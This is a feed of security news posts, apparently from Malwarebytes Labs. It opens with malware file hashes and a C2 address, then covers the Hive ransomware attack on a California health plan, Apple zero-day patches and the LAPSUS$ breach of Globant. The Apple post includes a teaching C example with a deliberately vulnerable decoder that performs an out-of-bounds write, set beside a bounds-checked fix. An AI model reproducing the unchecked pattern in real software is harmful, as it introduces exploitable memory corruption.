1ce85d7be2e0717b79fbe0132e6851d81d0478dba563991b3404be9e58d745b1
58c93b729273ffa86ed7baa7f00ccd9664ab9b19727010a5a263066bff77cee8
ed0128095910fa2faa44e41f9623dc0ba26f00d84be178ef46c1ded003285ae3
Excel doc:
c1afb561cd5363ac5826ce7a72f0055b400b86bd7524da43474c94bc480d7eff
Elephant dropper (base-update.exe):
9e9fa8b3b0a59762b429853a36674608df1fa7d7f7140c8fccd7c1946070995a
Elephant downloader (java-sdk.exe):
8ffe7f2eeb0cbfbe158b77bbff3e0055d2ef7138f481b4fac8ade6bfb9b2b0a1
Elephant Implant (oracle-java.exe):
99a2b79a4231806d4979aa017ff7e8b804d32bfe9dcc0958d403dfe06bdd0532
Elephant Client (microsoft-cortana.exe):
60bdfecd1de9cc674f4cd5dd42d8cb3ac478df058e1962f0f43885c14d69e816
C2:
194.31.98.124

The post New UAC-0056 activity: There’s a Go Elephant in the room appeared first on Malwarebytes Labs.

Hive ransomware impacts California non-profit health organisation

Ransomware authors are once again targeting health services, holding important files to ransom and impacting potentially vital services. On this occasion, the victims are a non-profit organisation assisting people with their healthcare needs in California.

When Hive ransomware strikes

The victim, Partnership HealthPlan of California, has apparently been struggling since at least March 24 with this outbreak of Hive ransomware. Hive ransomware has been around since June 2021, and is a typical targeted ransomware-as-a-service (RaaS). It leverages threats to publish exfiltrated data to pressure victims to pay up. The ransomware group is known to work with affiliates that use various methods to compromise company networks.

Last August, the FBI published a paper detailing indicators of Hive compromise, along with additional tactics and techniques used by the ransomware operators. It is not a threat to be taken lightly.

The impact of ransomware

The website for the embattled provider currently reads as follows:

Partnership HealthPlan of California recently became aware of anomalous activity on certain computer systems within its network. We are working diligently with third-party forensic specialists to investigate this disruption, safely restore full functionality to affected systems, and determine whether any information may have been potentially accessible as a result of the situation. Should our investigation determine that any information was potentially accessible, we will notify affected parties according to regulatory guidelines. We appreciate your patience and understanding and apologize for any inconvenience.

They go on to list what to do if you’re a partnership member or provider, along with the warning not to send any PII via email. As noted on VentureBeat, setting up alternate methods of contact (in this case, Gmail addresses) is a smart move in case their regular email comms are also compromised.

A slice of data exfiltration to round things off

Any impact on medical services can be extremely serious. Anything from routine appointments and check-ups to delayed operations or medical assistance can be the end result. The affected organisation in this case serves upwards of 600,000 people in the California region.

Additionally, the ransomware operators claim to have stolen 400GB of files. This allegedly includes 850k PII records, which include names, addresses, and social security numbers. This is less than ideal, though investigations are still ongoing. The primary concern right now has to be that services are restored to full functionality. The human impact of healthcare attacks is significant, and it is the kind of additional worry that people using those services don't need to be dealing with.

This story is still developing, and we’ll add any important information to the blog as it comes to light. If you think you may be affected by this incident, you should contact the affected organisation using the contact details they’ve provided as soon as you can.

The post Hive ransomware impacts California non-profit health organisation appeared first on Malwarebytes Labs.

Update now! Apple patches two zero-day vulnerabilities that may have been actively exploited

Apple has released security updates for macOS Monterey 12.3.1, iOS 15.4.1, iPadOS 15.4.1, tvOS 15.4.1, and watchOS 8.5.1. The updates patch two vulnerabilities; for each of them the advisory states that Apple is aware of a report that the issue may have been actively exploited.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the vulnerabilities that were patched in the updates:

  • CVE-2022-22674
  • CVE-2022-22675

Intel Graphics Driver

The vulnerability listed as CVE-2022-22674 exists in the Intel Graphics Driver and is described as an out-of-bounds read issue that may lead to the disclosure of kernel memory and that was addressed with improved input validation. Impacted devices are Macs running macOS Monterey. The graphics drivers are built into the Mac operating system.

AppleAVD

The vulnerability listed as CVE-2022-22675 exists in the AppleAVD audio and video decoding component and is described as an out-of-bounds write issue that was addressed with improved bounds checking. Impacted devices include:

  • Macs running macOS Monterey
  • iPhone 6s and later
  • iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Out-of-bounds read and write

If a flaw in a program allows it to read or write outside of the bounds set for the program, it can read memory it should not see (disclosing data such as kernel memory, as in the Intel Graphics Driver case) or manipulate other parts of memory which are allocated to more critical functions. An out-of-bounds write can allow an attacker to place code in a part of memory where it will be executed with permissions that the program and user should not have.

Specific details about the vulnerabilities have not been disclosed, which is customary, since Apple wants to give as many users as possible a chance to update before giving others a chance to abuse them.
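To make the bug class concrete, here is an added example that is not Apple's code and does not model the real AppleAVD or graphics driver: a toy frame decoder that copies a payload into a fixed-size buffer, once trusting the declared length and once with the kind of bounds checking the advisory describes as the fix. The wire format (one length byte followed by payload) and all names are constructed for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define FRAME_BUF 16

/* Constructed layout: data[] is the decode target, guard[] sits right after
 * it so that an overflow of data[] becomes visible as a changed guard byte. */
typedef struct { uint8_t data[FRAME_BUF]; uint8_t guard[4]; } frame_t;

/* Vulnerable: trusts the declared length. A value above FRAME_BUF writes past
 * data[] (out-of-bounds write); a value above the bytes actually supplied
 * reads past the input (out-of-bounds read). Shown for contrast only. */
size_t decode_unchecked(const uint8_t *in, size_t in_len, frame_t *out) {
    (void)in_len;                   /* never consulted: that is the bug */
    uint8_t declared = in[0];
    memcpy(out->data, in + 1, declared);
    return declared;
}

/* Hardened: the declared length is validated against both the destination
 * capacity and the bytes actually present before any copy. Returns the
 * number of bytes decoded, or 0 when the frame is rejected. */
size_t decode_checked(const uint8_t *in, size_t in_len, frame_t *out) {
    if (in == NULL || out == NULL || in_len < 1) return 0;
    uint8_t declared = in[0];
    if (declared > FRAME_BUF) return 0;           /* would overflow data[] */
    if ((size_t)declared > in_len - 1) return 0;  /* would over-read input */
    memcpy(out->data, in + 1, declared);
    return declared;
}

int main(void) {
    frame_t f;
    memset(&f, 0, sizeof f);
    memset(f.guard, 0xAA, sizeof f.guard);
    /* Constructed malformed frame: declares 20 payload bytes (> FRAME_BUF). */
    uint8_t bad[21] = {20};
    memset(bad + 1, 'X', 20);
    decode_unchecked(bad, sizeof bad, &f);        /* clobbers guard[] */
    printf("unchecked: guard[0]=0x%02x (0xaa if intact)\n", f.guard[0]);
    memset(f.guard, 0xAA, sizeof f.guard);
    size_t n = decode_checked(bad, sizeof bad, &f); /* rejected, guard kept */
    printf("checked: returned %zu, guard[0]=0x%02x\n", n, f.guard[0]);
    return 0;
}
```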

Stay safe, everyone!

The post Update now! Apple patches two zero-day vulnerabilities that may have been actively exploited appeared first on Malwarebytes Labs.

Globant suffers network breach due to LAPSUS$ compromise

Globant, an IT and software development firm with offices all around the globe, admitted in a press statement on Wednesday that it has suffered a breach of its network. Affected data includes (but may not be limited to) some source code and certain project documentation of clients.

“We have recently detected that a limited section of our company’s code repository has been subject to unauthorized access. We have activated our security protocols and are conducting an exhaustive investigation,” company officials wrote. “To date, we have not found any evidence that other areas of our infrastructure systems or those of our clients were affected. We are taking strict measures to prevent further incidents.”

The breach allegedly represents the latest work of the increasingly notorious threat actor group LAPSUS$, which claimed responsibility for the attack this week. In a message sent on Telegram to 45,000 followers, individuals who claim to be behind LAPSUS$ first announced that they were "officially back from vacation."

The Telegram message sent by LAPSUS$ to its channel. It’s business as usual. The message contains links related to the Globant breach, including a screenshot of the data the group has taken. Some of the folders were clearly labeled “apple-health-app,” “Facebook,” and “DHL.” (Source: Ars Technica)

A follow-up message sent shortly after reads:

For anyone who is interested about the poor security practices in use at Globant.com. I will expose the admin credentials for ALL their devops platforms below.

As of this writing, Globant has not confirmed when it was breached, nor has it mentioned whether a group has already approached it for ransom.

More about LAPSUS$

Globant is the latest company in a lengthening list of huge names compromised by LAPSUS$, a relatively new group in the online extortion gig. This list already includes Microsoft, Nvidia, Samsung, LG, and Okta.

If you're wondering whether LAPSUS$ has always targeted such large companies, the answer is yes. When LAPSUS$ first grabbed the attention of the cybersecurity community, they had already compromised companies like Impresa, the largest media conglomerate in Brazil; Claro, one of Brazil's telecommunications operators; and Brazil's Ministry of Health.

These early attacks have led people to believe that LAPSUS$ hailed from South America. Notably, their use of Spanish and Portuguese was akin to native speakers. Microsoft tracks the group as “DEV-0537”.

As a criminal group, their primary focus is to hack companies, steal their data, and demand a ransom. In some cases, they have used ransomware and phishing (among other social engineering tactics) as a precursor to getting inside target systems. LAPSUS$ is known not only for stealing data but also for stealing code from the companies they target. It is said that they use stolen code to better hide their malware. To date, they have reportedly pilfered a total of $14 million (£10.6 million).

Before revealing that the group breached Globant and stole the company’s data, LAPSUS$ claimed that some of their members were taking “a vacation”. In cybersecurity, we have learned that this could either mean that threat actors are moving away from the spotlight to lay low—because of the pressure to evade law enforcement—or the actors have somehow already been captured. It appears that the latter applies in LAPSUS$’s case.

In late March, cybersecurity researchers investigating these high-profile hacks were able to trace the attacks to a 16-year-old teenager in Oxford, England. The teen, who remains unnamed due to his age, goes by the online monikers "White" and "Breachbase" and is believed to be the group's mastermind. It is said that the Oxford teen hacker's personal information, including that of his parents, was leaked by rival hackers. On top of that, forensic investigators used evidence from the hacks and public information to tie the teen to the hacking group.

Another suspected LAPSUS$ member is also a teenager but based in Brazil. According to Bloomberg, this teen is “so skilled at hacking—and so fast—that researchers initially thought the activity they were observing was automated.”

Investigators looking into the hacks have found a total of seven unique accounts associated with the extortion group. This indicates that there are likely more members of LAPSUS$ that are involved.

On March 21, the FBI launched a public appeal for information about the group. Four days later, news of the UK police arresting seven teenagers between the ages of 16 and 21 broke. It was part of an international police investigation into the LAPSUS$ gang. Today, according to the BBC, two of the teens (aged 16 and 17) have been formally charged with “three counts of unauthorised access to a computer with intent to impair the reliability of data, one count of fraud by false representation, and one count of unauthorised access to a computer with intent to hinder access to data.”

The 16-year-old, whom we believe could be the teen from Oxford, is also charged with “one count of causing a computer to perform a function to secure unauthorised access to a program.”

The post Globant suffers network breach due to LAPSUS$ compromise appeared first on Malwarebytes Labs.